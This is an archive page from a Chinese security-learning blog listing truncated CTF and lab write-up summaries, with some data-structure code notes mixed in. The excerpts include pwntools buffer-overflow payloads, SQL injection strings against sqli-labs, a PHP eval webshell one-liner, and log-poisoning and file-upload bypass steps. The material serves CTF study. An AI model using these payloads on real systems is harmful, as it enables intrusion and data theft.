10 2019 档案

摘要:#encoding=utf-8 #!usr/bin/python from pwn import * io = remote('111.198.29.45',42643) io.recvuntil("secret[0] is ") # recvuntil(some_string) 接收到 some_ 阅读全文
posted @ 2019-10-31 18:37 东坡肉肉君 阅读(1117) 评论(0) 推荐(0) 编辑
摘要:#include<iostream> #include<stdio.h> using namespace std; /** 创建一个堆:大的数是根 */ void swap(int arr[],int i,int j) { int temp= arr[i]; arr[i]=arr[j]; arr[j 阅读全文
posted @ 2019-10-31 13:18 东坡肉肉君 阅读(180) 评论(0) 推荐(0) 编辑
摘要:''' @Modify Time @Author python基本语法 2019/10/26 8:16 laoalo ''' import functools from filecmp import cmp print('#'*50,"字符串") dss = " hello pyqt.5 " s1 阅读全文
posted @ 2019-10-30 22:54 东坡肉肉君 阅读(1028) 评论(0) 推荐(0) 编辑
摘要:# ! /usr/bin/env python # -*- coding:utf-8 -*- from pwn import * context.log_level = 'debug' elf = ELF('leve2') sys_addr = elf.symbols['system'] sh_ad 阅读全文
posted @ 2019-10-30 21:24 东坡肉肉君 阅读(1766) 评论(1) 推荐(1) 编辑
摘要:先反编译 : int __cdecl main(int argc, const char **argv, const char **envp) { write(1, "Hello, World\n", 0xDuLL); return vulnerable_function(); } 追踪一下 "vu 阅读全文
posted @ 2019-10-30 16:46 东坡肉肉君 阅读(1289) 评论(0) 推荐(0) 编辑
摘要:解法一字符串拼接: 1.得到签名sign http://8fa4531c-1164-49b7-a700-70e77e6aacb7.node3.buuoj.cn/geneSign?param=flag.txtread 2.添加Cookie发送请求得到flag Cookie: action=readsc 阅读全文
posted @ 2019-10-30 15:10 东坡肉肉君 阅读(1457) 评论(0) 推荐(0) 编辑
摘要:看样子是要让我们通过read(0, &unk_601068, 0x10uLL),读入 unk_601068 将 dword_60106C 覆盖 6c-68=4,所以: from pwn import * io = remote("111.198.29.45",45604) payload = "A" 阅读全文
posted @ 2019-10-30 13:47 东坡肉肉君 阅读(787) 评论(0) 推荐(0) 编辑
摘要:所以题目要求是输入生日1926 payload: from pwn import * io = remote("111.198.29.45",40803) io.recvline() io.sendline('1234') io.recvline() payload = "A"*8 payload 阅读全文
posted @ 2019-10-30 13:30 东坡肉肉君 阅读(535) 评论(0) 推荐(0) 编辑
摘要:所以题目要求是输入生日1926l 阅读全文
posted @ 2019-10-30 13:27 东坡肉肉君 阅读(172) 评论(0) 推荐(0) 编辑
摘要:没有环的过程分析: #include<stdio.h> #include<stdlib.h> #include<iostream> #define VERTICES 6 #define LINE 5 using namespace std; /* parent:数组解决并查集合并问题 VERTICE 阅读全文
posted @ 2019-10-30 11:42 东坡肉肉君 阅读(724) 评论(0) 推荐(0) 编辑
摘要:PS:所有的代码示例使用的都是这个图 2019-10-29 利用p126的算法5.3建立二叉树,并完成三种遍历算法 中序 后序 先序 #include<iostream> #include<stack> #define TElemType char using namespace std; type 阅读全文
posted @ 2019-10-30 00:49 东坡肉肉君 阅读(825) 评论(0) 推荐(0) 编辑
摘要://二叉树的顺序存储表示 #define MAXTSIZE 100 typedef TElemtype SqBiTree[MAXTSIZE]; SqBiTree bt; //二叉树的二叉链表存储表示 typedef struct BiTNode { TElemType data; struct Bi 阅读全文
posted @ 2019-10-30 00:24 东坡肉肉君 阅读(417) 评论(0) 推荐(0) 编辑
摘要:看一下页面源码,发现了提示: calc.php?num=encodeURIComponent(("#content").val())("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, $("#content")相当于docume 阅读全文
posted @ 2019-10-29 10:34 东坡肉肉君 阅读(6057) 评论(0) 推荐(3) 编辑
摘要:这题算是一次复现,虽然师傅们的wp已经很详细了但是对于我菜虚困来说还是有些点不是很懂,所以特此梳理一下思路 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7E 阅读全文
posted @ 2019-10-28 22:56 东坡肉肉君 阅读(696) 评论(0) 推荐(0) 编辑
摘要:思路:绕过判断,直接跳转到算flag的函数哪里 1.找到计算flag的函数在哪里,记住 "0075e940",这是入口 2.找到一个现成的跳转指令,修改它: 3.重新运行一遍,得到flag: 后记: 其实一开始是打算走ida,无奈没找到第二个数组Orz,求师傅教教趴o(TヘTo) sub_45A7B 阅读全文
posted @ 2019-10-28 20:37 东坡肉肉君 阅读(923) 评论(0) 推荐(0) 编辑
摘要:学到一个函数: _mm_storeu_si128((__m128i *)&v5, _mm_loadu_si128((const __m128i *)&xmmword_413E34)); 所以这里我们找到“xmmword_413E34” 这里需要转一次码: 最后将得到的字符串倒一下: 参考: http 阅读全文
posted @ 2019-10-28 01:13 东坡肉肉君 阅读(600) 评论(0) 推荐(0) 编辑
摘要:载入ida,直接搜‘ctf’就有了,坑点是不要交“MCTF{XXX}”,要交“flag{XXXX}” 阅读全文
posted @ 2019-10-28 00:41 东坡肉肉君 阅读(325) 评论(0) 推荐(0) 编辑
摘要:感觉这题偏向于misc ,Orz 用ida打开: 解码: 阅读全文
posted @ 2019-10-28 00:33 东坡肉肉君 阅读(239) 评论(0) 推荐(0) 编辑
摘要://线性表的顺序表示 #define MAXSIZE 100 #define Elemtype int #define Status bool #define OK 1 #define ERROR 0 #define OVERFLOW typedef struct { Elemtype *elemt 阅读全文
posted @ 2019-10-27 22:16 东坡肉肉君 阅读(293) 评论(0) 推荐(0) 编辑
摘要:将得到的交上去居然不对: 然而大写却过了: flag{ILOVEYOU} 因为摩斯电码在设计的时候就没有区分大小写,而且从码表中可以看到,都是大写,所以在网站上解密出来的自己转成大写 阅读全文
posted @ 2019-10-25 23:27 东坡肉肉君 阅读(1280) 评论(0) 推荐(1) 编辑
摘要:题目:e00cf25ad42683b3df678c61f42c6bda flag{admin1} 算是一个资源收集吧,Orz,https://www.cmd5.com/ 阅读全文
posted @ 2019-10-25 22:56 东坡肉肉君 阅读(958) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2019-10-25 22:49 东坡肉肉君 阅读(2648) 评论(0) 推荐(0) 编辑
摘要:感觉这题师傅们已经写得很详细了,我就做一个思路梳理吧,顺道学一波.user.ini 步骤: 1.上传一个“.user.ini”文件 2.上传自己的马“a.jpg” 3.菜刀连接 "http://b302f16c-6762-4496-be93-e544912aaf0d.node3.buuoj.cn/u 阅读全文
posted @ 2019-10-25 21:52 东坡肉肉君 阅读(1842) 评论(0) 推荐(0) 编辑
摘要:id=0 id=1 id=2 id=3 发现结果不一样,尝试 : ">4","=4","<4" : 在自己的环境下验证一下: 爆一下数据库: id=(ascii(substr(database(),1,1))>32) ''' @Modify Time @Author 2019/10/25 19:28 阅读全文
posted @ 2019-10-25 19:57 东坡肉肉君 阅读(3142) 评论(1) 推荐(1) 编辑
摘要:<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; publ 阅读全文
posted @ 2019-10-25 12:04 东坡肉肉君 阅读(3786) 评论(0) 推荐(0) 编辑
摘要:BFS:队 graph = { "A" : ["B","C"], "B" : ["A","C","D"], "C" : ["A","B","D","E"], "D" : ["B","C","E","F"], "E" : ["C&q 阅读全文
posted @ 2019-10-24 17:33 东坡肉肉君 阅读(4370) 评论(0) 推荐(1) 编辑
摘要:fuzz ing了一下,发现了一堆过滤: 同时发现了注入点,这个应该是var_dump()函数 第二天的分割线 好吧我放弃了,找了一下wp 正确解:select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag 这种解发第一次遇到赶紧在自 阅读全文
posted @ 2019-10-24 00:02 东坡肉肉君 阅读(8911) 评论(2) 推荐(1) 编辑
摘要:首先爬一遍整个网站,发现有没注册的时候有“login”,"register",这两个页面,注册一个123用户登录后发现有 "index“,”post“,”logout“,”change password“这四个界面,根据题目提示的admin,猜测是不是要让我用admin来登录这个网站?然后我在log 阅读全文
posted @ 2019-10-22 20:33 东坡肉肉君 阅读(8970) 评论(0) 推荐(3) 编辑
摘要:一开始还以为是在登录框进行注入,于是fuzzing了一下发现一个注入点都没有 1 and 1 1 and 0 1' and '1 1' and '0 1" and "1 1" and "0 1) and (1 1) and (0 1)) and ((1 1)) and ((0 1') and ('1 阅读全文
posted @ 2019-10-22 20:16 东坡肉肉君 阅读(2363) 评论(0) 推荐(0) 编辑
摘要:这一题一开始我没有理解"www.tar.gz"的涵义,还以为有一个其他的网站叫这个,后来才突然顿悟他也有可能是一个目录!!!地址栏输入”/www.tar.gz“ 然后就可以得到源码 http://63e1a96d-8153-41cc-bd10-2fe12e5ce3ef.node3.buuoj.cn/ 阅读全文
posted @ 2019-10-22 00:13 东坡肉肉君 阅读(1573) 评论(0) 推荐(0) 编辑
摘要:第一次遇到模板注入的题,赶紧记笔记,此篇相当于对大佬的做法的复现Orz,师傅太强了https://blog.csdn.net/weixin_44255856/article/details/97687299,这道题出自 2018的护网杯 在hints里看到条件,猜测 ” filename=/flll 阅读全文
posted @ 2019-10-21 22:48 东坡肉肉君 阅读(2260) 评论(0) 推荐(2) 编辑
摘要:语法: int preg_match_all (字符串pattern subject [,数组和matches[ flags = PREG_PATTERN_ORDER [,整数$ offset = 0 ]]] ) 搜索主题中所有匹配模式给定正则表达式的匹配结果并将它们以 阅读全文
posted @ 2019-10-19 18:53 东坡肉肉君 阅读(1423) 评论(0) 推荐(1) 编辑
摘要:什么是 GUID? 全球唯一标识符 (GUID) 是一个字母数字标识符,用于指示产品的唯一性安装。在许多流行软件应用程序(例如 Web 浏览器和媒体播放器)中,都使用 GUID。 GUID 的格式为“xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”,其中每个 x 是 0-9 阅读全文
posted @ 2019-10-14 20:06 东坡肉肉君 阅读(5440) 评论(0) 推荐(0) 编辑
摘要:这个是赵师傅给我们提供的训练靶场,最好都打一遍,但是出于找flag的角度,特此记录一下,flag在哪里【没错,我就是喜欢我的蓝变红,哈】 ?id=1' :报错,说明就是用这个闭合的 ?id=0' union select 1,2,group_concat(schema_name) from info 阅读全文
posted @ 2019-10-14 12:47 东坡肉肉君 阅读(2209) 评论(0) 推荐(1) 编辑
摘要:跟着赵师傅学CTF,这里是我的学习记录 ?file=/flag ?file=/var/log/nginx/access.log :包含ngnix的日志记录 在user-agent里面插入 :bbbbbbb<?php phpinfo();?>aaaaaaaaaaaaaa 接着试一下refer头 本来是 阅读全文
posted @ 2019-10-13 11:25 东坡肉肉君 阅读(6051) 评论(0) 推荐(2) 编辑
摘要:昨天Q.R给我发了一份unity3D的misc,第一次接触这种题型,故此记录一下 1.用ApktoolBox(apk反编译工具是一款针对安卓应用的反编译软件)解包 解包后的文件 2.用.NET Reflector打开Assembly-CSharp.dll(解包好的文件里的那一份)。(unity在打包 阅读全文
posted @ 2019-10-13 09:01 东坡肉肉君 阅读(336) 评论(0) 推荐(0) 编辑
摘要:Pass-01:前端过滤 提示 需要上传一个webshell我选择的是一句话,根据提示可采用两种方法进行绕过 <?php eval(@$_POST['a']); ?> 绕过方法 1.查看源码,发现允许上传的是".jpg|.png|.gif"这三种类型,所以就考虑到是不是可以先把后缀改成png,然后抓 阅读全文
posted @ 2019-10-12 21:52 东坡肉肉君 阅读(695) 评论(0) 推荐(0) 编辑
摘要:在响应包里面发现tips,base64解码后看到提示信息: sql="SELECTusername,passwordFROMadminWHEREusername=".username."'" if (!empty(row) &&row['password'] md5($pass 阅读全文
posted @ 2019-10-12 01:04 东坡肉肉君 阅读(634) 评论(0) 推荐(0) 编辑
摘要:http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% uname=admin&passwd=1' and '1 : 一个一个式,但是要用url编码绕过滤[其实是猜他会去解析,这里我是猜出来的] 重定向以后,根据提示输入ls: 阅读全文
posted @ 2019-10-12 00:47 东坡肉肉君 阅读(245) 评论(0) 推荐(0) 编辑
摘要:1' and '0,1' and '1 : 单引号闭合 1' order by 3--+ : 猜字段 1' union select 1,database()# :开始注入,发现正则过滤 1' and extractvalue(0x0a,concat(0x0a,(database())))# :数据 阅读全文
posted @ 2019-10-11 21:24 东坡肉肉君 阅读(5525) 评论(1) 推荐(2) 编辑
摘要:安装pwntool: 命令行运行: 1 pip install pwntools 1 python 2 import pwn 3 pwn.asm("xor eax,eax") 出现'1\xc0' 说明安装成功 在pycharm中运行出错:_curses.error: must call (at le 阅读全文
posted @ 2019-10-10 22:06 东坡肉肉君 阅读(5230) 评论(1) 推荐(1) 编辑
摘要: 阅读全文
posted @ 2019-10-10 00:59 东坡肉肉君 阅读(245) 评论(0) 推荐(0) 编辑
摘要:Less-54: ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ Your Password:CL0FY8NWDK ?i 阅读全文
posted @ 2019-10-09 23:52 东坡肉肉君 阅读(298) 评论(0) 推荐(0) 编辑
摘要:检测点11.2 CF(判断溢出) OF(判断溢出) SF(结果是否为0找到的规律是只要第八位为1就填1) ZF (结果是否为0) PF(1的个数是否为偶数) 分析 sub al,al 0 0 0 1 1 减法,结果为0,zf=1 mov al,10H 0 0 0 1 1 mov指令不改变标志位 ad 阅读全文
posted @ 2019-10-08 20:03 东坡肉肉君 阅读(315) 评论(0) 推荐(0) 编辑
摘要:Less-39: ?id=1 and 1 ,?id=1 and 1 : 回显不同,数字型 ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=databas 阅读全文
posted @ 2019-10-08 00:28 东坡肉肉君 阅读(407) 评论(0) 推荐(0) 编辑
摘要:Less-21:括号+单引号绕过+base64cookie编码 总感觉我已经把sql注入做成代码审计了:P 1 <?php 2 //including the Mysql connect parameters. 3 include("../sql-connections/sql-connect.ph 阅读全文
posted @ 2019-10-06 11:51 东坡肉肉君 阅读(527) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示